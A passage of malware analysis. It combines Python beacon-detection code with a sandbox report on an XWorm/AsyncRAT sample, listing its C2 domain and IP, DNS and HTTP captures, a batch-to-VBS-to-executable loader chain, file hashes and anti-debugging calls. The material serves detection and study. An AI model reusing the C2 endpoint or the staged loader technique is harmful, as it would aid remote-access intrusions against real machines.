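def outbound_series(table, client=CLIENT):
    """Outbound packet times keyed by (dst ip, dst port). The ephemeral source port is dropped
    on purpose so that a RAT reconnecting on a new port keeps one time series."""
    series = defaultdict(list)
    for line in table.splitlines():
        ts, _sport, dport, src, dst = line.split()
        if src == client:
            series[(dst, int(dport))].append(seconds(ts))
    return {key: sorted(times) for key, times in series.items()}


def collapse_bursts(times, gap=BURST_GAP):
    """Keep only the first packet of each burst so SYN, PSH and ACK of one exchange count once."""
    kept = []
    for t in times:
        if not kept or t - kept[-1] > gap:
            kept.append(t)
    return kept


def dominant_period(times, tol=TOLERANCE):
    """Greedily cluster the sorted inter-arrival gaps (a gap joins the open cluster while it is
    within tol of that cluster's first member); return (median gap, size) of the largest cluster."""
    gaps = sorted(b - a for a, b in zip(times, times[1:]))
    best, cluster = [], []
    for g in gaps:
        if cluster and g - cluster[0] > tol:
            best = max(best, cluster, key=len)
            cluster = []
        cluster.append(g)
    best = max(best, cluster, key=len)
    return (round(median(best), 1), len(best)) if best else (None, 0)


def find_beacons(table, min_repeats=MIN_REPEATS):
    """(dst ip, dst port) -> (period in seconds, repeats) for every destination that repeats a period."""
    beacons = {}
    for key, times in outbound_series(table).items():
        period, repeats = dominant_period(collapse_bursts(times))
        if repeats >= min_repeats:
            beacons[key] = (period, repeats)
    return beacons
```

Run against the constructed rows, `find_beacons(PACKETS)` reports only 147.185.221.17:36301, with a dominant gap of about 10.3 s seen six times across the four connections, while 208.95.112.1:80 (the single ip-api.com request and its late FIN/ACK exchange) yields no repeating gap. Keying on destination rather than on the 5-tuple is the point: per-connection the RAT never exceeds two or three pings before it reconnects, which is exactly where a naive per-flow periodicity check loses it.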
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 5, 2024 11:15:11.342549086 CEST | 56748 | 53 | 192.168.2.5 | 1.1.1.1
Sep 5, 2024 11:15:11.351741076 CEST | 53 | 56748 | 1.1.1.1 | 192.168.2.5
Sep 5, 2024 11:15:15.276340961 CEST | 49245 | 53 | 192.168.2.5 | 1.1.1.1
Sep 5, 2024 11:15:15.309273005 CEST | 53 | 49245 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 5, 2024 11:15:11.342549086 CEST | 192.168.2.5 | 1.1.1.1 | 0x541e | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 5, 2024 11:15:15.276340961 CEST | 192.168.2.5 | 1.1.1.1 | 0x98e5 | Standard query (0) | character-acquisitions.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 5, 2024 11:14:55.290291071 CEST | 1.1.1.1 | 192.168.2.5 | 0x7c2d | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 11:14:55.290291071 CEST | 1.1.1.1 | 192.168.2.5 | 0x7c2d | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 11:15:11.351741076 CEST | 1.1.1.1 | 192.168.2.5 | 0x541e | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 11:15:15.309273005 CEST | 1.1.1.1 | 192.168.2.5 | 0x98e5 | No error (0) | character-acquisitions.gl.at.ply.gg | | 147.185.221.17 | A (IP address) | IN (0x0001) | false
                                          • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49720 | 208.95.112.1 | 80 | 5808 | C:\Users\user\AppData\Local\Temp\x.exe

Timestamp | Bytes transferred | Direction | Data
Sep 5, 2024 11:15:11.368690968 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Sep 5, 2024 11:15:11.835160017 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Thu, 05 Sep 2024 09:15:11 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false

The `hosting` field of the ip-api.com line endpoint is a boolean that marks hosting, colocation and data-center address space; this request is the "Check if machine is in data center or colocation facility" behaviour listed in the signatures, and the `false` reply means the sandbox's egress address was not classified as such.


                                          Target ID:0
                                          Start time:05:14:59
                                          Start date:05/09/2024
                                          Path:C:\Users\user\Desktop\x.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\x.exe"
                                          Imagebase:0xd00000
                                          File size:695'808 bytes
                                          MD5 hash:98A2D7AEE74EFE11A83E1514199A1346
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:1
                                          Start time:05:14:59
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:05:14:59
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "
                                          Imagebase:0x7ff7611b0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:05:14:59
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:05:15:05
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\findstr.exe
                                          Wow64 process (32bit):false
                                          Commandline:findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat"
                                          Imagebase:0x7ff633140000
                                          File size:36'352 bytes
                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:6
                                          Start time:05:15:05
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\cscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                                          Imagebase:0x7ff786ad0000
                                          File size:161'280 bytes
                                          MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:7
                                          Start time:05:15:06
                                          Start date:05/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\x.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\AppData\Local\Temp\x.exe
                                          Imagebase:0x560000
                                          File size:210'432 bytes
                                          MD5 hash:74D8F5A1E068A454FFAA5C8FD32A3E44
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 74%, ReversingLabs
                                          • Detection: 77%, Virustotal, Browse
                                          Reputation:low
                                          Has exited:true

                                          Target ID:11
                                          Start time:05:16:36
                                          Start date:05/09/2024
                                          Path:C:\Windows\System32\WerFault.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 5808 -s 2288
                                          Imagebase:0x7ff6d9ce0000
                                          File size:570'736 bytes
                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:14.1%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:3
                                            Total number of Limit Nodes:0
                                            execution_graph 521 7ff8470209fd 522 7ff847020a03 FreeConsole 521->522 524 7ff847020aae 522->524

                                            Callgraph

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2152827645.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID: ConsoleFree
                                            • String ID:
                                            • API String ID: 771614528-0
                                            • Opcode ID: 2e7b88027d71df04802c8f37300fa852463274ba2499be8fa79cff3a6f86da48
                                            • Instruction ID: 9114688f00ef9cea91f573a1c21aa22f86a1f46a5a37326322890841ffb99802
                                            • Opcode Fuzzy Hash: 2e7b88027d71df04802c8f37300fa852463274ba2499be8fa79cff3a6f86da48
                                            • Instruction Fuzzy Hash: 9831E43190DB588FDB59DF68D84AAFA7BF0EF55320F04416FD08AC3592CA78A846CB51

                                            Execution Graph

                                            Execution Coverage:18.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:50%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0

                                            Control-flow Graph

                                            control_flow_graph 0 7ff8470210fa-7ff847021141 3 7ff847021143-7ff847021149 0->3 4 7ff847021176-7ff84702117d 0->4 5 7ff84702114b-7ff847021175 3->5 6 7ff84702117e-7ff84702119e 3->6 4->6 5->4 11 7ff8470211a0 6->11 12 7ff8470211a5-7ff8470211a6 6->12 11->12 13 7ff8470211a8 12->13 14 7ff8470211ac-7ff8470211ae 12->14 13->14 15 7ff8470211b0 14->15 16 7ff8470211b3-7ff8470211b6 14->16 15->16 17 7ff8470211b8 16->17 18 7ff8470211ba-7ff8470211be 16->18 17->18 19 7ff8470211c1-7ff847021200 18->19 20 7ff8470211c0 18->20 23 7ff84702189e-7ff8470218e5 19->23 24 7ff847021206-7ff84702139e call 7ff847020620 * 11 call 7ff847020a38 19->24 20->19 77 7ff8470213a8-7ff847021403 call 7ff8470204b0 call 7ff847020348 call 7ff847020358 24->77 78 7ff8470213a0-7ff8470213a7 24->78 89 7ff847021407-7ff84702141a 77->89 78->77 91 7ff84702142d-7ff84702143d 89->91 92 7ff84702141c-7ff847021426 89->92 95 7ff84702143f-7ff84702144a 91->95 96 7ff847021465-7ff847021485 91->96 92->91 95->89 98 7ff84702144c-7ff84702145e call 7ff847020348 95->98 103 7ff847021487-7ff847021491 call 7ff847020368 96->103 104 7ff847021496-7ff847021578 96->104 98->96 103->104 118 7ff84702157a-7ff8470215ad 104->118 119 7ff8470215c6-7ff8470215f9 104->119 118->119 126 7ff8470215af-7ff8470215bc 118->126 130 7ff8470215fb-7ff84702161c 119->130 131 7ff84702161e-7ff84702164e 119->131 126->119 129 7ff8470215be-7ff8470215c4 126->129 129->119 132 7ff847021656-7ff84702168d 130->132 131->132 139 7ff84702168f-7ff8470216b0 132->139 140 7ff8470216b2-7ff8470216e2 132->140 142 7ff8470216ea-7ff8470216ff 139->142 140->142 144 7ff847021701-7ff84702170f 142->144 145 7ff847021710-7ff8470217cc call 7ff847020378 call 7ff8470209d8 call 7ff847021008 142->145 144->145 163 7ff8470217ce call 7ff8470207a8 145->163 164 7ff8470217d3-7ff84702186c 145->164 163->164
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: N_H$3N_^$SAN_^
                                            • API String ID: 0-1389020372
                                            • Opcode ID: efc5e62e455a264787de2133c3c7da321ff1c2e677b0accc6d88f935c91ece04
                                            • Instruction ID: a1bf2eff100ad210e4278451d6bf5120b2fe1ffd7ac43540cb713729278cd7f1
                                            • Opcode Fuzzy Hash: efc5e62e455a264787de2133c3c7da321ff1c2e677b0accc6d88f935c91ece04
                                            • Instruction Fuzzy Hash: D432E622B2EA559FEB58FB7894592BD77D1FF88790F400579D04DC32C6DE28AC418741

                                            Control-flow Graph

                                            control_flow_graph 263 7ff847027301-7ff8470273bd CheckRemoteDebuggerPresent 266 7ff8470273bf 263->266 267 7ff8470273c5-7ff847027408 263->267 266->267
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: 0514eff98a863a43881e671dfdab971b9907cc3a60489ce2c8cff4f14a65b8e8
                                            • Instruction ID: c1c862189b2982b9131a97cac93cd0d12e9102dd6d34604823eb860ea513e5b3
                                            • Opcode Fuzzy Hash: 0514eff98a863a43881e671dfdab971b9907cc3a60489ce2c8cff4f14a65b8e8
                                            • Instruction Fuzzy Hash: 153112319087188FCB58DF58C88A7ED7BE0EF65321F05426BD489D7292DB34A846CB91

                                            Control-flow Graph

                                            control_flow_graph 531 7ff847025d56-7ff847025d63 532 7ff847025d6e-7ff847025e37 531->532 533 7ff847025d65-7ff847025d6d 531->533 537 7ff847025e39-7ff847025e42 532->537 538 7ff847025ea3 532->538 533->532 537->538 539 7ff847025e44-7ff847025e50 537->539 540 7ff847025ea5-7ff847025eca 538->540 541 7ff847025e89-7ff847025ea1 539->541 542 7ff847025e52-7ff847025e64 539->542 547 7ff847025ecc-7ff847025ed5 540->547 548 7ff847025f36 540->548 541->540 543 7ff847025e68-7ff847025e7b 542->543 544 7ff847025e66 542->544 543->543 546 7ff847025e7d-7ff847025e85 543->546 544->543 546->541 547->548 550 7ff847025ed7-7ff847025ee3 547->550 549 7ff847025f38-7ff847025fe0 548->549 561 7ff84702604e 549->561 562 7ff847025fe2-7ff847025fec 549->562 551 7ff847025f1c-7ff847025f34 550->551 552 7ff847025ee5-7ff847025ef7 550->552 551->549 554 7ff847025ef9 552->554 555 7ff847025efb-7ff847025f0e 552->555 554->555 555->555 556 7ff847025f10-7ff847025f18 555->556 556->551 563 7ff847026050-7ff847026079 561->563 562->561 564 7ff847025fee-7ff847025ffb 562->564 571 7ff84702607b-7ff847026086 563->571 572 7ff8470260e3 563->572 565 7ff847025ffd-7ff84702600f 564->565 566 7ff847026034-7ff84702604c 564->566 568 7ff847026011 565->568 569 7ff847026013-7ff847026026 565->569 566->563 568->569 569->569 570 7ff847026028-7ff847026030 569->570 570->566 571->572 573 7ff847026088-7ff847026096 571->573 574 7ff8470260e5-7ff847026176 572->574 575 7ff847026098-7ff8470260aa 573->575 576 7ff8470260cf-7ff8470260e1 573->576 582 7ff84702617c-7ff84702618b 574->582 578 7ff8470260ac 575->578 579 7ff8470260ae-7ff8470260c1 575->579 576->574 578->579 579->579 580 7ff8470260c3-7ff8470260cb 579->580 580->576 583 7ff84702618d 582->583 584 7ff847026193-7ff8470261f8 call 7ff847026214 582->584 583->584 591 7ff8470261fa 584->591 592 7ff8470261ff-7ff847026213 584->592 591->592
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c77f2132805874af1ad3b5d2d46ecce15b23d12e2e069620a3e5a00c0047382
                                            • Instruction ID: 99bc71e59962575c89f730ee23221d3f8cd8858b3970634fabcc1166c125609a
                                            • Opcode Fuzzy Hash: 5c77f2132805874af1ad3b5d2d46ecce15b23d12e2e069620a3e5a00c0047382
                                            • Instruction Fuzzy Hash: 8AF1923191DA8D8FEFA8EF28C8557E937D1FF54350F04426AE84DC7695CB38A8458B82

                                            Control-flow Graph

                                            control_flow_graph 593 7ff847026b02-7ff847026b0f 594 7ff847026b1a-7ff847026be7 593->594 595 7ff847026b11-7ff847026b19 593->595 599 7ff847026be9-7ff847026bf2 594->599 600 7ff847026c53 594->600 595->594 599->600 602 7ff847026bf4-7ff847026c00 599->602 601 7ff847026c55-7ff847026c7a 600->601 608 7ff847026c7c-7ff847026c85 601->608 609 7ff847026ce6 601->609 603 7ff847026c39-7ff847026c51 602->603 604 7ff847026c02-7ff847026c14 602->604 603->601 606 7ff847026c18-7ff847026c2b 604->606 607 7ff847026c16 604->607 606->606 610 7ff847026c2d-7ff847026c35 606->610 607->606 608->609 611 7ff847026c87-7ff847026c93 608->611 612 7ff847026ce8-7ff847026d0d 609->612 610->603 613 7ff847026ccc-7ff847026ce4 611->613 614 7ff847026c95-7ff847026ca7 611->614 618 7ff847026d7b 612->618 619 7ff847026d0f-7ff847026d19 612->619 613->612 615 7ff847026ca9 614->615 616 7ff847026cab-7ff847026cbe 614->616 615->616 616->616 620 7ff847026cc0-7ff847026cc8 616->620 622 7ff847026d7d-7ff847026dab 618->622 619->618 621 7ff847026d1b-7ff847026d28 619->621 620->613 623 7ff847026d2a-7ff847026d3c 621->623 624 7ff847026d61-7ff847026d79 621->624 629 7ff847026e1b 622->629 630 7ff847026dad-7ff847026db8 622->630 625 7ff847026d3e 623->625 626 7ff847026d40-7ff847026d53 623->626 624->622 625->626 626->626 628 7ff847026d55-7ff847026d5d 626->628 628->624 631 7ff847026e1d-7ff847026ef5 629->631 630->629 632 7ff847026dba-7ff847026dc8 630->632 642 7ff847026efb-7ff847026f0a 631->642 633 7ff847026dca-7ff847026ddc 632->633 634 7ff847026e01-7ff847026e19 632->634 636 7ff847026dde 633->636 637 7ff847026de0-7ff847026df3 633->637 634->631 636->637 637->637 638 7ff847026df5-7ff847026dfd 637->638 638->634 643 7ff847026f0c 642->643 644 7ff847026f12-7ff847026f74 call 7ff847026f90 642->644 643->644 651 7ff847026f7b-7ff847026f8f 644->651 652 7ff847026f76 644->652 652->651
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 922279ae465c87cb8981df2939d2211721fe51a511d4576fd16b5be431569d76
                                            • Instruction ID: b1a909f4434c0e79184d737ee43ed72db579876e9ecf39e42aa17ecfddc033ba
                                            • Opcode Fuzzy Hash: 922279ae465c87cb8981df2939d2211721fe51a511d4576fd16b5be431569d76
                                            • Instruction Fuzzy Hash: A7E1A03190DA8E8FEFA8EF28C8557E977E1FB54350F14426ED84DC7695CE78A8408B81

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a587817130e488c62aa8740e66b6f7934d489f25b038efc1b30c8a6eadb221c
                                            • Instruction ID: 3cb14678cc7f9360d11f293c9a5578f472ad6759e82704b5502258ade862d17c
                                            • Opcode Fuzzy Hash: 2a587817130e488c62aa8740e66b6f7934d489f25b038efc1b30c8a6eadb221c
                                            • Instruction Fuzzy Hash: 7EC1B031F1EA4A9FEF88EB68845577D76D2EF98384F14457AD05EC32D2DE28AC028741

                                            Control-flow Graph

                                            control_flow_graph 256 7ff847028bbd-7ff847028ca0 RtlSetProcessIsCritical 260 7ff847028ca8-7ff847028cdd 256->260 261 7ff847028ca2 256->261 261->260
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID: CriticalProcess
                                            • String ID:
                                            • API String ID: 2695349919-0
                                            • Opcode ID: aaa8f63ab93248e71848f494e30e97db54223f6d592cd10a1fc75c4dfa4c4f0a
                                            • Instruction ID: bccb23247783f22591ebaf9f01ebbfcfe7138ba9d8f0e4b9b70708f81c59b6b3
                                            • Opcode Fuzzy Hash: aaa8f63ab93248e71848f494e30e97db54223f6d592cd10a1fc75c4dfa4c4f0a
                                            • Instruction Fuzzy Hash: 3541C33180C7498FDB19DFA8D845AE9BBF0EF56311F04416ED08AD3692CB78A846CB91
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.3114212323.00007FF847020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ff847020000_x.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3d515504b74ed5858c730d5a3a20c00c8ea0cf78695010f16c0a5132e566ad5a
                                            • Instruction ID: deceac570b4ecd32187ee28d7099a1e9339ff3ab0883171019c7b10988ce1319
                                            • Opcode Fuzzy Hash: 3d515504b74ed5858c730d5a3a20c00c8ea0cf78695010f16c0a5132e566ad5a
                                            • Instruction Fuzzy Hash: CFD1B33191DA8D8FEBA8EF28C8557E977D1FF59350F04426EE84DC7291CB74A8408B82